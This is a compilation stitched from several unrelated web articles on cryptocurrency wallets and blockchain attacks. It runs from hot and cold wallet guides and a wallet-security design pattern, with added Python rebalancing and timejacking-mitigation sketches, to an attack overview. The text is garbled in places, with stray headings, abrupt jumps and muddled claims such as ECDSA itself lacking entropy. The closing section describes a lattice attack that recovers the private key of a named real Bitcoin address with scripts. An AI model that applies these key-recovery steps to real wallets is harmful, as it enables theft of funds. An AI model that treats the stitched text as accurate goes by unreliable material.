      Ledger is one of the most popular crypto hardware wallet providers, offering the Ledger Nano X, Ledger Nano S and the Ledger Nano S plus wallets. These devices are about the size of a thumb drive, running on the Ledger operating system called the Blockchain Open Ledger Operating System. It also has an in-built clear OLED display screen interface, and two navigation buttons for confirming transactions. Ledger comes complete with a Ledger Live mobile app and a high level of security with its secure element chip used to store cryptographic data. Their flagship model, the Ledger Nano X, offers cryptocurrency compatibility of more than 5,500 tokens.

      Trezor

      Trezor is another well-known hardware wallet that offers the Trezor One and Trezor Model T. The Trezor Model T offers compatibility with 1,456 coins and tokens, and comes with the desktop, browser and Android Trezor Suite. Trezor Suite is a user interface which lets you search and buy cryptocurrencies, manage your holdings, and send crypto securely. While this improves the user experience, there is the potential to introduce security vulnerabilities as you are using internet-enabled devices.

      Considerations When Choosing a Wallet

      Depending on your needs, you may opt for a hot wallet, a cold wallet, or both. We’ve summed up how the three types of wallets covered above compare against each other in this table:

      Security

      Security is a core feature when choosing a crypto wallet. Blockchain technology is known for its secure and immutable nature; ensuring your wallet has the best security features is necessary. Cold wallets are more secure than hot wallets since they are not always connected to the internet with exposure to potential cybersecurity risks like phishing or other hacks and scams.
      Besides, ensure your wallet has two-factor authentication (2FA) functionality to prevent unauthorized access to your assets.

      Convenience

      Since cold wallets store private keys offline, they involve plugging in physical devices and linking to web-based accounts to transfer funds. On the other hand, hot wallets live online; hence they are much easier to use for everyday transactions, like day trading.

      Additional Transaction Fees

      You’ll still be subject to gas fees, regardless of whichever wallet you’re using. However, exchange-based wallets may include an additional charge that is derived from gas prices, although this fee may be waived if you are holding or staking the exchange’s native token. Before downloading or purchasing any wallet, check their service charges first.

      Supported Coins

      The wallet you plan to use may not support the coin you want to invest in. Some wallets support only one coin! Consider Mycelium, for instance. Despite having exceptional functionalities, it only supports Bitcoin. Therefore, be sure to check the wallet’s list of supported coins and tokens before using it to avoid disappointments.

      Insurance

      Some custodians provide asset insurance for users who incur losses through a technical problem or theft. Custodians differ in insurance policies, but selecting one that insures your assets in collaboration with a financial institution is advisable. For example, Binance provides insurance for USD deposits of up to $250,000 for U.S. customers. It has partnered with the Federal Deposit Insurance Corporation (FDIC) to implement this policy.

      Using Hot and Cold Wallets to Manage Your Crypto Portfolio

      Hot wallets are more convenient for daily use than cold wallets. On the other hand, cold wallets guarantee maximum security than hot wallets. Both wallets support a broad range of cryptocurrencies. Therefore, the ideal wallet for you relies on whether you prioritize the safety of your funds over the convenience of using a wallet regularly.
      You can enjoy both benefits by combining both methods. For instance, you can hold a small percentage of funds in a hot wallet for trading purposes and keep the rest of your funds in a cold wallet as a long-term investment.

      As a blockchain network participant, a party can rely on so-called “wallets” to manage its accounts and interaction with the blockchain. A party has multiple keys.

      Problem

      A party’s wallet is vulnerable to malicious attacks leading to key theft. If compromised, an attacker can use the key to issue transactions in that party’s identity. How to prevent the compromisation of keys?

      Forces:

      • Security – A key may be hacked when being stored in a device, especially when connected to the Internet.
      • Usability – Some keys may be frequently used by blockchain participants while other keys may be used infrequently or might act as backup.

      Solution

      Users can choose to store keys in 2 types of wallets, namely hot wallet and cold wallet. Hot wallet typically refers to the blockchain gateways that are connected to the Internet.

      Hot and Cold Wallet Storage Pattern

      Through a hot wallet, a user is able to directly issue transactions to the blockchain. Hence, a hot wallet typically holds frequently used keys. Cold wallet refers to key storage that is kept off-line to minimise potential attacks. Thus, a cold wallet typically contains rarely used keys. A cold wallet can be any device disconnected from the Internet or even a paper recording an entity’s keys. When a key stored in the cold wallet is required to sign a transaction, the user needs to connect the cold wallet device to a computer and copy-paste the key in the relevant field.

      It is also possible to automate the migration of keys between the 2 wallets based on their frequency of use, e.g., least recently used and most frequently used. Also, a certain key can be marked as critical such that it primarily stays in the cold wallet. When it is required to sign a transaction it can be copied to the hot wallet.
      However, as soon as the transaction is signed it should be deleted from the hot wallet. In certain application settings, blockchain platforms, and wallet implementations, it is also possible to sign transactions entirely on the cold wallet and use the hot wallet to issue/relay the signed transactions to the blockchain.

      Benefits

      • Secure storage – Cold wallets are isolated from the Internet; hence, provide secure storage for keys.
      • Usability – Such a secure storage also preserves the usability of keys, as once a cold wallet is connected to the Internet (either directly or via a middleware), a party can utilise those keys.

      Drawbacks

      • Security – Hot wallets store one’s secret keys online hence are more vulnerable to theft. A cold wallet becomes more vulnerable as soon as it is connected to the hot wallet to copy/migrate a key.
      • Usability – Cold wallets are more secure than hot wallets but less convenient to use, as the user has to connect to the cold wallet.

      Related patterns

      • In master and sub key generation pattern master key can be kept in the cold wallet while sub-keys can be stored in hot wallet.
      • Key sharding pattern could be used in a wallet application to split and merge a key to minimise its compromise.
      • When being integrated into wallet applications, predefined delegates in delegate list pattern can replace key ownership of a compromised key.

      Known uses

      • MyEtherWallet is a hot wallet with a graphical interface for instant payment and withdrawal in Ethereum.
      • Trezor is a cryptocurrency hardware wallet, designed to store and encrypt users’ coins, passwords, and other digital keys. It is a single-purpose computer with independent memory to save all private data.
      • Ledger provides hardware wallet products to store users’ private keys in a secure hardware device, protecting the cryptocurrencies.

      Explore the different crypto storage options

      What are the pros and cons of each wallet?

      A hot wallet refers to any cryptocurrency wallet connected to the internet.
      Generally, hot wallets are easier to set up, access, and accept more tokens. But they are also more vulnerable to hacker attacks, possible regulations, and other technical vulnerabilities.

      Cold Storage refers to any cryptocurrency wallet that is not connected to the internet. Overall, a cold wallet is more secure, but it doesn’t accept as many cryptocurrencies as hot wallets.

      Should I Get a Cold Wallet?

      If you are going to own Bitcoin, Ethereum, or other cryptocurrencies worth more than $100, you could buy a cold wallet right now — this is how much it costs.

      Maybe you’ve heard people say, “Bitcoin gives you this opportunity of being your own bank”? There are advantages and disadvantages to this responsibility. Generally, cryptocurrencies have fewer middleman fees, less messy banking regulations, etc. Still, it is your responsibility to ensure the safety of your assets.

      Overall, as a rule, you should leave as much money in your hot wallet as you would with a traditional leather wallet that you keep in your pocket. Think of it this way, if a thief was about to steal your regular wallet, you would only lose the money you have in your pocket, not the money in your bank account. In short, here’s an analogy that can help you: a hot wallet can be thought of as a pocket wallet that you walk around town with; a cold wallet is a bank deposit.

      Pros & Cons of Hot Wallets

      Using a hot wallet will give you the following benefits:

      • By entering your pin and access number into the wallet, you quickly access your coins.
      • The investment cost is lower.
      • It has an extensive portfolio of applications or software that function as a hot wallet.
      • You need to set a PIN code or a security code to use it.
      • They allow you to connect to any platform so you can operate and trade.

      Using one of these wallets may have the following disadvantages:

      • Higher risk of theft as money is stored in the cloud and is more vulnerable to cyber crooks.
      • It needs to be connected to the internet all the time.
Otherwise, it can’t be supported, so it could be a big problem if the internet connection fails.

Pros & Cons of Cold Wallets

Using this wallet will give you the following benefits:

  • This type of wallet works without the internet, giving you a high level of security since many thefts take place on the internet.
  • A cold wallet supports ERC20 or other token standards, which can support an unlimited number of tokens.
  • You need to set a PIN code or a security code to use it.
  • You can take your device anywhere.

Using one of these wallets may generate the following disadvantages:

  • There is a risk of losing your device.
  • You cannot trade with these types of devices.
  • You need to invest around $100 to get it.
  • Like any physical device, it is prone to failure, corruption, or reading problems.

Remember that if you want to trade, a hot wallet is the better option. Still, we recommend encrypting it as best you can and choosing the best software for the most significant security. On the other hand, if you are a non-trading investor and want the highest level of protection, a cold wallet will be a better choice.

Hot and cold wallets are both necessities for safely storing your crypto assets. While the former is used to send and receive crypto tokens, the latter securely holds your accumulating cryptocurrencies without vulnerabilities. As hot wallets require an internet connection to send and receive tokens, they are largely at risk of crypto attacks that prove to be hugely expensive. So, a hot wallet cannot hold a large sum of tokens. Here is where the usage of cold wallets comes into play.

Utilizing both hot and cold wallets is a safe practice in crypto vulnerability management, leaving no loopholes for attackers. Let us understand the hot and cold wallet architecture and how it should be set up to mitigate the risk of vulnerabilities.

  • What are hot wallets?
  • What are cold wallets?
  • Hot wallet vs Cold Wallet: Differences
  • Hot and cold wallet setup
  • How does hot and cold wallet interact?
  • How do hot and cold wallet setups in big systems work?

What are hot wallets?

Hot wallets are crypto wallets that are always connected to the internet and are more easily accessible for users than cold wallets. They can be mobile, desktop or web-based wallets, and are user-friendly and facilitate easy transfer of currencies between crypto users.

Private keys are kept and encrypted on the app itself in hot wallets and stored online. It has hidden vulnerabilities, and hackers can target it to break into the system. Due to its ease of use, it is the most preferred wallet for buying and trading cryptocurrencies or cashing out assets after a while.

How does a hot wallet storage work?

When you install a hot wallet storage into your computer or device, it allows you to buy, send and receive crypto assets without really holding any crypto. Rather it holds the private keys using which a user can initiate transactions. This is possible, as it interacts with the blockchain storing your assets.

Metamask is one of the most popular hot wallets available today. So, we will explain how a hot wallet works using Metamask.

Metamask is available as a web browser extension that acts as a bridge between the blockchain, especially Ethereum, and your browser. When you download and install Metamask and add it as your browser extension, you will be asked to either ‘import wallet’ or ‘create a wallet.’ Import wallet allows you to add an existing wallet by typing a secret recovery phrase, while the latter enables creating a new crypto wallet.

If you create a new wallet, you need to set a new Metamask password to secure the app or platform on your device. This password can be a string of characters, face recognition, or even a fingerprint that you can regularly use to access the app, instead of a secret recovery phrase. Once you create a password, you must copy the secret backup phrase and paste it or write it down in a safe place.
For each account you have in your Metamask wallet, you will be provided with a private key. You can unlock your cryptocurrencies using this private key.

What are cold wallets?

Cold wallets are hardware-based and exist offline. Although a cold wallet is not as convenient to use as a hot wallet, it is far more secure. Using this offline wallet keeps your keys entirely protected from online hackers.

Cold wallets can be paper wallets or hardware devices. A paper wallet is a traditional way of keeping private and public keys written down or printed on paper. It is a safe way to store keys as it is not prone to phishing attacks. Hardware wallets are external devices in the form of a USB or Bluetooth device that stores your keys.

As they offer less liquidity, cold wallets are best for people planning to buy and hold their crypto assets for a long period. To do transactions between an offline cold wallet and an online hot wallet, you need to connect the hardware device to another device with internet accessibility, mostly a computer, using a plug, then transfer the required amount from the cold wallet to the hot wallet.

How does a cold wallet storage work?

A cold wallet, on its own, cannot connect to a blockchain and complete a transaction. When a user wants to use a cold wallet for transactions, it needs to be connected to a device with an internet connection. However, this does not put your private key under security threat. Let us see how it works.

A cold wallet storage can be roughly divided into two components, a cold wallet core and a cold gateway. While a cold wallet core has no internet access and is completely air-gapped, a cold gateway is connected to the internet. A transaction is created in the cold gateway in a cold wallet, which is then signed in the offline cold wallet core.
So, if a user wants to send x number of tokens to another wallet, the transaction will be created in the cold gateway with an internet connection, but the transaction signing will be done offline. After the transaction is signed, it is disclosed or broadcast online in the cold wallet core.

Let us take the example of the cold wallet ELLIPAL to understand this better.

ELLIPAL is an air-gapped hardware wallet that is essentially a secure cold wallet. It is entirely isolated from the internet and is designed to prevent unauthorized access, hacks, malware and other online attacks. So, to initiate transactions, the users need to install the ELLIPAL mobile app, acting as a proxy for it to connect to the blockchain.

The whole process of transactions via an ELLIPAL wallet can be summarized into the following steps:

  • The user initiates a transaction on the app.
  • The app asks for confirmation from the cold wallet.
  • The hardware wallet signs the transaction via a private key.
  • After approval, the app completes the transaction.

Hot wallet vs Cold Wallet: Differences

Criterion | Hot Wallet | Cold Wallet
Internet Connectivity | Online | Offline
Accessibility | Easily accessible | Low accessibility
Tangibility | Software-based wallets; so, intangible | Physical wallets; so, tangible
Types | Mobile, web or desktop wallets | Paper or hardware wallets
Safety | Prone to hacking and attacks. So, less secure. | Less threat from hacking and attacks. So, more secure.
Convenience | Easy and convenient | Less convenient
Cost | Less expensive | More expensive
Usability | Best to store a small amount of crypto | Best to store large amounts of cryptocurrency

Hot and cold wallet setup

Although using a hot wallet for transactions is easy and convenient, it cannot be used to keep a large number of cryptocurrencies due to security threats. It is advisable to store your large amount of cryptocurrencies in cold wallets as they are the least vulnerable to security threats, such as malware attacks and phishing.
One important way of setting up wallets to avoid risks is to combine both hot and cold wallets, which reduces your funds’ online exposure. In this, each wallet is set up for different purposes.

The hot wallets serve as the receiving wallet and sending wallet. The receiving wallet will manage the funds coming to the exchange, while the sending wallet will be used to send cryptos for transactions and trade.

As both the sending and receiving wallets will be hosted on online servers, the number of funds kept in both wallets should be minimized to reduce the risks of crypto vulnerability. The rest of the cryptos should be stored in your cold wallet. Doing this can ensure that most of your asset is safe in case of any security compromises.

How does hot and cold wallet interact?

As all of the funds that are transferred to you come to your receiving wallet, there are chances of crypto accumulation in your receiving wallet, resulting in crypto vulnerabilities. So, you need to send most of it to the cold wallet and some to the sending wallet. You need to have a minimum amount in your receiving wallet to transfer to the sending wallet once it falls short of cryptos, and this ensures that the sending wallet has enough cryptos whenever needed.

However, suppose funds are not reliably coming to the receiving wallet, and the sending wallet urgently needs currencies. In that case, you can transfer the required amount from the cold wallet to the sending wallet.

How to mitigate crypto vulnerability?

Assume that you have a total of 200 ETH in your possession, and at any time, you want to avoid risking more than 30% of your funds. Based on this calculation, you need to set maximum and minimum thresholds per wallet to reduce the severity of any malware attack.

So, the receiving wallet should have a minimum of 10 ETH and a maximum of 20 ETH. Similarly, the sending wallet should possess at least 20 ETH and up to 40 ETH. The rest of your assets should be kept in the cold wallet.
If you set a threshold for your sending and receiving wallets, adhere to it and ensure that the balance neither exceeds the maximum nor drops below the minimum. Excess funds are prone to vulnerabilities, and you cannot produce the required amount when needed if it is below the limit. So, always maintain an adequate amount of funds.

How do hot and cold wallet setups in big systems work?

Hot and cold wallet setups vary, and each setup is designed based on the developer’s requirements and thought process. Through the following infographics, let us understand how hot and cold wallet setups are designed in big systems.

In the above-given infographic, if a person wants to send x number of tokens to another user, they input a request in the front end of the application, which is fetched in the API layer or the backend of the app. The backend transfers the input request to the wallet server.

In a typical wallet architecture, a wallet server handles multiple microservices like managing nodes, databases, APIs or transaction services. As the user input, in this case, is related to the transaction service, the request is sent to this microservice. The transaction service then sends the request to the wallet microservices, which handle all services related to the wallet.

The wallet microservices can vary from platform to platform. In the above infographic, the wallet microservices include the following:

  • Fund management for the hot wallet – It ensures that the hot wallet always sticks to its threshold without crypto overflow or deficit to prevent risk exposure.
  • Whitelisted IPs – It limits the number of people who can access your domain or server to a few trusted IP addresses permitted by you.
  • Token – It manages and keeps track of your tokens, like x number of ETH or x number of SOL.
  • Service monitoring – This microservice checks whether all services are working without glitches.
  • Thresholds – These check whether or not you have the required amount in your wallet to send it to others.
  • 2-step authentication – It is a security process where you have to verify your identity twice before accessing the wallet ecosystem.
  • Notifications – It alerts users on important matters like successful transaction completion notifications.
  • KMS – Key management system or KMS helps create, store, and manage keys safely.
  • Rotate hot wallet

When the transaction input is transferred from the transaction service to the wallet microservices, all of the above microservices are carried out. Once all the services are done, and it is ascertained that your hot wallet has a sufficient number of tokens, the x number of tokens is sent to the receiver. The transaction is then said to be successfully completed.

Conclusion

Merging both hot and cold wallets can help mitigate the risk of crypto attacks for both the users and the service providers. It acts as a comfortable middle ground by offering the benefits of both wallets, where one is used for crypto trading, and the other is used to hold the cryptos safely.

Even though only hot wallets were popular during the initial days of crypto emergence, usage of cold wallets is getting more popular these days. Moreover, blending hot and cold wallets is gradually gaining prominence among crypto experts and service providers, owing to its huge benefits. Using just one wallet is, thus, outdated, and people gradually realize the advantages of combining both hot and cold wallets as an additional security measure.

GitHub
Telegram: https://t.me/cryptodeeptech
Video: https://youtu.be/NrQ3oNxlrlU
Source: https://cryptodeep.ru/cold-and-hot-wallets

Cryptanalysis
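The threshold scheme from the “How to mitigate crypto vulnerability?” part of the article above (200 ETH in total, at most 30% online, receiving wallet 10 to 20 ETH, sending wallet 20 to 40 ETH), written out as an added Python sketch that is not part of the original article. The wallet names, the mid-band refill target and the rule that the receiving wallet only gives up what it holds above its own minimum are assumptions.

```python
from dataclasses import dataclass
from decimal import Decimal


@dataclass(frozen=True)
class Band:
    minimum: Decimal
    maximum: Decimal

    @property
    def target(self) -> Decimal:
        # Assumption: refills and sweeps aim for the middle of the band.
        return (self.minimum + self.maximum) / 2


@dataclass(frozen=True)
class Transfer:
    source: str
    dest: str
    amount: Decimal
    needs_offline_signing: bool  # True only when funds leave the cold wallet


# Figures from the article: 200 ETH in total, at most 30% of it online.
TOTAL = Decimal(200)
MAX_ONLINE_FRACTION = Decimal("0.30")
BANDS = {
    "receiving": Band(Decimal(10), Decimal(20)),
    "sending": Band(Decimal(20), Decimal(40)),
}


def worst_case_online(total, bands, max_fraction):
    """Largest amount the bands allow online; reject bands that break the cap."""
    worst = sum((b.maximum for b in bands.values()), Decimal(0))
    if worst > total * max_fraction:
        raise ValueError(f"bands allow {worst} online, cap is {total * max_fraction}")
    return worst


def plan_rebalance(balances, bands):
    """Return (transfers, resulting balances) that bring both hot wallets into band."""
    bal = dict(balances)
    plan = []

    def move(src, dst, amount):
        if amount > 0:
            plan.append(Transfer(src, dst, amount, needs_offline_signing=(src == "cold")))
            bal[src] -= amount
            bal[dst] += amount

    recv_band, send_band = bands["receiving"], bands["sending"]

    # 1. Sending wallet short: refill from the receiving wallet first (online),
    #    and only then request a cold-wallet withdrawal (signed offline).
    if bal["sending"] < send_band.minimum:
        need = send_band.target - bal["sending"]
        spare = max(bal["receiving"] - recv_band.minimum, Decimal(0))
        from_recv = min(need, spare)
        move("receiving", "sending", from_recv)
        move("cold", "sending", min(need - from_recv, bal["cold"]))

    # 2. Anything above a band maximum is excess online exposure: sweep it to cold.
    if bal["receiving"] > recv_band.maximum:
        move("receiving", "cold", bal["receiving"] - recv_band.minimum)
    if bal["sending"] > send_band.maximum:
        move("sending", "cold", bal["sending"] - send_band.target)

    return plan, bal


if __name__ == "__main__":
    print("worst case online:", worst_case_online(TOTAL, BANDS, MAX_ONLINE_FRACTION))
    # Constructed balances: deposits piled up in the receiving wallet.
    start = {"receiving": Decimal(55), "sending": Decimal(12), "cold": Decimal(133)}
    transfers, end = plan_rebalance(start, BANDS)
    for t in transfers:
        print(t)
    print(end)
```

Withdrawals flagged `needs_offline_signing` are the ones that must go through the cold wallet's offline signing step instead of being executed by the online service.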
  19. CRYPTO DEEP TECH

In this article, we will talk about all known attacks on the blockchain, as well as smart contract vulnerabilities. Blockchain isn’t really as secure as we tend to think. Though security is integrated throughout all blockchain technology, even the strongest blockchains come under attack by modern cybercriminals.

Blockchains can resist traditional cyber attacks quite well, but cybercriminals are coming up with new approaches specifically for hacking blockchain technology. In this article, we describe the main attack vectors against blockchain technology and take a look at the most significant blockchain attacks to date.

Cybercriminals have already managed to misuse blockchains to perform malicious actions. Ransomware attacks like WannaCry and Petya wouldn’t have been so massive if attackers hadn’t received their rewards in cryptocurrencies. Now, it looks like hackers consider exploiting blockchain security vulnerabilities as their main source of revenue.

In March 2019, white hat hackers found 43 bugs in various blockchain and cryptocurrency platforms in just 30 days. They even found vulnerabilities in such famous platforms as Coinbase, EOS, and Tezos.

However, weak spots are often challenging to detect, since they can be hidden in unobvious places. For instance, the Parity multisig wallet was hacked by breaking a library that had a withdraw function in it. The attacker managed to initialize the library itself as a wallet and claim owner rights to it. As a result, 573 wallets were affected, $30 million worth of crypto was stolen, and another $180 million rescued by a white hat hacker group was later returned to the rightful owners.

By attacking such huge networks as Bitcoin and Ethereum, cybercriminals show that they’re clever enough to disprove the myth of blockchain security.
Let’s consider the five most common blockchain attack vectors:

Blockchain Network Attacks

A blockchain network includes nodes that create and run transactions and provide other services. For instance, the Bitcoin network is formed by nodes that send and receive transactions and miners that add approved transactions to blocks. Cybercriminals look for network vulnerabilities and exploit them with the following types of attacks.

Distributed Denial of Service

Distributed denial of service (DDoS) attacks are hard to execute on a blockchain network, but they’re possible.

When attacking a blockchain network using DDoS, hackers intend to bring down a server by consuming all its processing resources with numerous requests. DDoS attackers aim to disconnect a network’s mining pools, e-wallets, crypto exchanges, and other financial services. A blockchain can also be hacked with DDoS at its application layer using DDoS botnets.

In 2017, Bitfinex suffered from a massive DDoS attack. It was especially inconvenient for the IOTA Foundation, which had launched their IOTA token on the platform the day before Bitfinex informed users about the attack. Three years later, in February 2020, Bitfinex experienced another DDoS attack just a day after the OKEx cryptocurrency exchange noticed a similar attack.

Transaction Malleability Attacks

A transaction malleability attack is intended to trick the victim into paying twice. In the Bitcoin network, every transaction has a hash that’s a transaction ID. If attackers manage to alter a transaction’s ID, they can try to broadcast the transaction with a changed hash to the network and have it confirmed before the original transaction.

If this succeeds, the sender will believe the initial transaction has failed, while the funds will still be withdrawn from the sender’s account. And if the sender repeats the transaction, the same amount will be debited twice. This hack is successful once the two transactions are confirmed by miners.

Mt. Gox, a Bitcoin exchange, went bankrupt as the result of a malleability attack in 2014. However, Bitcoin seems to have solved this issue by introducing the Segregated Witness (SegWit) process, which separates signature data from Bitcoin transactions and replaces it with a non-malleable hash commitment to each signature.

Timejacking Attack

Timejacking exploits a theoretical vulnerability in Bitcoin timestamp handling. During a timejacking attack, a hacker alters the network time counter of the node and forces the node to accept an alternative blockchain. This can be achieved when a malicious user adds multiple fake peers to the network with inaccurate timestamps. However, a timejacking attack can be prevented by restricting acceptance time ranges or using the node’s system time.

The timejacking attack is also an extension of the Sybil attack. Each node maintains a time counter which is based on the median time of its peers, and if the median time differs from the system time by a certain value, then the node reverts to the system time. An attacker can flood the network with nodes reporting inaccurate timestamps, which can cause the network to slow down or speed up, leading to a desynchronization.

Routing Attacks on Cryptocurrencies

A routing attack can impact both individual nodes and the whole network. The idea of this hack is to tamper with transactions before pushing them to peers. It’s nearly impossible for other nodes to detect this tampering, as the hacker divides the network into partitions that are unable to communicate with each other. Routing attacks actually consist of two separate attacks:

  • A partition attack, which divides the network nodes into separate groups
  • A delay attack, which tampers with propagating messages and sends them to the network

Sybil Attacks in Cryptocurrency Mixers

A Sybil attack is arranged by assigning several identifiers to the same node. Blockchain networks have no trusted nodes, and every request is sent to a number of nodes.
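The two timejacking mitigations named in the Timejacking Attack section above (reverting to the system clock when the peers' median strays too far, and restricting the accepted timestamp range), as an added Python sketch that is not code from the article or from any node implementation. The 70-minute and 2-hour limits and the five-sample minimum follow values historically used by Bitcoin Core and are stated here as assumptions, since the article gives no numbers; the `netgroup` de-duplication is a hypothetical Sybil-cost measure, and the peer samples are constructed.

```python
import ipaddress
import statistics

MAX_TIME_ADJUSTMENT = 70 * 60        # assumption: 70-minute cap on peer-driven adjustment
MAX_FUTURE_BLOCK_TIME = 2 * 60 * 60  # assumption: blocks may be at most 2 hours ahead
MIN_SAMPLES = 5                      # assumption: ignore peers until 5 samples exist


def netgroup(addr):
    """Hypothetical grouping key: the /16 of an IPv4 address, the /32 of an IPv6 one."""
    ip = ipaddress.ip_address(addr)
    prefix = 16 if ip.version == 4 else 32
    return str(ipaddress.ip_network(f"{ip}/{prefix}", strict=False))


def peer_offsets(samples, system_time):
    """One clock offset per network group, so many peers in one range count once."""
    seen = {}
    for addr, peer_time in samples:
        seen.setdefault(netgroup(addr), peer_time - system_time)
    return list(seen.values())


def adjusted_time(system_time, offsets, max_adjust=MAX_TIME_ADJUSTMENT):
    """Median-of-peers clock that reverts to the system clock when the median strays."""
    if len(offsets) < MIN_SAMPLES:
        return system_time
    median = statistics.median(offsets)
    if abs(median) > max_adjust:
        return system_time  # revert to the local clock, as the article describes
    return system_time + int(median)


def accept_block_time(block_time, median_time_past, now, max_future=MAX_FUTURE_BLOCK_TIME):
    """Restricted acceptance range: later than recent blocks, not too far in the future."""
    return median_time_past < block_time <= now + max_future


# Constructed sample: five peers in different ranges with small drift, plus eight
# peers from a single documentation range all reporting a clock two hours ahead.
NOW = 1_700_000_000
SAMPLES = [
    ("198.51.100.7", NOW - 3),
    ("192.0.2.10", NOW + 1),
    ("10.1.0.5", NOW + 2),
    ("172.16.4.4", NOW + 4),
    ("100.64.3.9", NOW - 1),
] + [(f"203.0.113.{i}", NOW + 7200) for i in range(1, 9)]

if __name__ == "__main__":
    raw = [t - NOW for _, t in SAMPLES]
    print("ungrouped median rejected, clock stays at", adjusted_time(NOW, raw) - NOW)
    grouped = peer_offsets(SAMPLES, NOW)
    print("grouped offsets:", grouped, "adjustment:", adjusted_time(NOW, grouped) - NOW)
```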
Figure 1. Sybil attack

During a Sybil attack, a hacker takes control of multiple nodes in the network. Then the victim is surrounded by fake nodes that close up all their transactions. Finally, the victim becomes open to double-spending attacks. A Sybil attack is quite difficult to detect and prevent, but the following measures can be effective: increasing the cost of creating a new identity, requiring some type of trust for joining the network, or determining user power based on reputation.

A sybil attack is defined by Wikipedia as “a type of attack on a computer network service in which an attacker subverts the service’s reputation system by creating a large number of pseudonymous identities and uses them to gain a disproportionately large influence.” If the network does not keep the count of the nodes, then the attacker can completely isolate the victim node from the network.

The sybil attack on blockchain also works similarly, where an attacker tries to flood the network with their controlled nodes so that the victim only connects to the attacker controlled nodes. This can lead to a wide variety of damages where the attacker can prevent genuine blocks from being added to the chain, the attacker can add their own blocks to the chain, or they can cause confusion among the nodes, hampering the general functioning of the blockchain network.

In the above visual representation, the red nodes are controlled by the attacker, and they flood the network, making the victim connect only to a malicious node.

Sybil Attacks on Identity-Augmented Proof-of-Stake

IdAPoS is an identity-based consensus protocol for decentralised Blockchain networks that implements a trustless reputation system by extending Proof-of-Stake to facilitate leader selection in non-economic contexts.
Like any protocol operating in a public/permissionless setting, it is vulnerable to Sybil attacks in which byzantine actors interfere with peer sampling by presenting artificially large numbers of identities. This paper demonstrates what influence these attacks have on the stability of member selection of a Blockchain system using the IdAPoS protocol and investigates how attacks can be mitigated. As a novel protocol, its vulnerability to this type of attack has not previously been researched. The research question is approached via an agent-based model of an IdAPoS system in which both honest and malicious actors are represented as agents. Simulations are run on some reasonable configurations of an IdAPoS system that employ different attack mitigation strategies. The results show that a super strategy that combines multiple individual mitigation strategies is more effective for containing Sybil attacks than the unmitigated protocol and any other individual strategies proposed. In the simulation this strategy extended the time until a system was taken over by a malicious entity approximately by a factor of 5. These positive initial results indicate that further research into the practical viability of the protocol is warranted.

Eclipse Attacks on Bitcoin

An eclipse attack requires a hacker to control a large number of IP addresses or to have a distributed botnet. Then the attacker overwrites the addresses in the “tried” table of the victim node and waits until the victim node is restarted. After restarting, all outgoing connections of the victim node will be redirected to the IP addresses controlled by the attacker. This makes the victim unable to obtain transactions they’re interested in. Researchers from Boston University initiated an eclipse attack on the Ethereum network and managed to do it using just one or two machines.

Eclipse attack arises in the blockchains, where the architecture partitions workloads and assigns tasks among the peers.
As an example, if a chain has a node that has only eight outgoing connections and can support at most 128 threads at any given moment, each node has view access to only the nodes that are connected to it. The view of the chain for the victim node can be changed if an attacker attacks a specific node and gains control of the eight nodes connected to it. This can lead to a wide variety of damages that include double spending of the coins by tricking a victim into believing that a particular transaction has not occurred, and also attacks against the second layer protocols. The attacker can make the victim believe that a payment channel is open when it is closed, tricking the victim into initiating a transaction. The following diagram demonstrates a node under Eclipse attack.

Figure: Eclipse Attack

In the above visual representation, the red nodes are controlled by the attacker, and they can change the copy of the chain of the victim node by making it connect to attacker controlled nodes.

Eclipse Attacks on Ethereum

In this technical report, we present three vulnerabilities affecting the Ethereum blockchain network and client. First, we outline an eclipse attack that allows an adversary to partition the peer-to-peer network without monopolizing the connections of the victim. This attack is possible by exploiting the block propagation design of Ethereum. Second, we present an exploit to force a node to accept a longer chain with lower total difficulty than the main chain. Finally, we outline a bug in Ethereum’s difficulty calculation. We provide countermeasure proposals for each reported vulnerability.

Long-Range Attacks in Proof-of-Stake Systems

Long range attacks target networks that use the proof of stake (PoS) consensus algorithm, in which users can mine or validate block transactions according to how many coins they hold.
These attacks can be categorized into three types:

  • Simple — A naive implementation of the proof of stake protocol, when nodes don’t check block timestamps
  • Posterior corruption — An attempt to mint more blocks than the main chain in a given time frame
  • Stake bleeding — Copying a transaction from the honestly maintained blockchain to a private blockchain maintained by the attacker

When conducting a long-range attack, a hacker uses a purchased or stolen private key of a sizable token balance that has already been used for validating in the past. Then, the hacker can generate an alternative history of the blockchain and increase rewards based on PoS validation.

2. User Wallet Attacks

Actually, blockchains and cybersecurity go together like salt and pepper until people interact with them. It may sound surprising, but blockchain users pose the greatest security threat. People know about the use of blockchain in cybersecurity, and tend to overestimate the security of the blockchain and overlook its weaknesses. User wallet credentials are the main target for cybercriminals.

To obtain wallet credentials, hackers try to use both traditional methods like phishing and dictionary attacks and new sophisticated methods like finding weaknesses in cryptographic algorithms. Here’s an overview of the most common ways of attacking user wallets.

Phishing Attacks

In 2018, there was an attack on IOTA wallets initiated with iotaseed.io (now offline), a fake online seed generator. Hackers conducted a phishing campaign with this service and collected logs with secret seeds. As a result, in January 2018, hackers successfully stole more than $4 million worth of IOTA from victims’ wallets.

Dictionary Attacks

During these attacks, a hacker attempts to break a victim’s cryptographic hash and salt by trying hash values of common passwords like password1. By translating clear text passwords to cryptographic hashes, attackers can find wallet credentials.
Vulnerable Signatures

Blockchain networks use various cryptographic algorithms to create user signatures, but they may also have vulnerabilities. For example, Bitcoin uses the ECDSA cryptographic algorithm to automatically generate unique private keys. However, it appears that ECDSA has insufficient entropy, which can result in the same random value in more than one signature. IOTA also faced cryptographic problems with its old Curl hash function.

Flawed Key Generation

Exploiting vulnerabilities in key generation, the hacker known as Johoe got access to private keys provided by Blockchain.info in December 2014. The attack happened as the result of a mistake that appeared during a code update that resulted in poor randomness of inputs for generating public user keys. Though this vulnerability was quickly mitigated, the flaw is still possible with the ECDSA algorithm.

Lattice Attack

Also, if two nonces ever repeat, no matter what the messages are, an attacker can easily detect this and immediately recover the secret key, again breaking our whole scheme.

https://cryptodeeptech.ru/lattice-attack/

In the Bitcoin blockchain, we found a certain transaction:

transaction: 08d917f0fee48b0d765006fa52d62dd3d704563200f2817046973e3bf6d11f1f

for Bitcoin Addresses: 15N1KY5ohztgCXtEe13BbGRk85x2FPgW8E

where using the Python script algorithmLLL.py with the installation of packages in GOOGLE COLAB

INSTALL >> SAGE + ECDSA + BITCOIN + algorithm LLL

Installation

Run Bash script: lattice.sh

Result in HEX format

Private key found!

File: ONESIGN.txt (ECDSA Signature R, S, Z Value)

We propagated fake signatures for the Python script algorithmLLL.py

File: PRIVATEKEY.txt

File: ADDRESS.txt

Let’s open bitaddress and check:

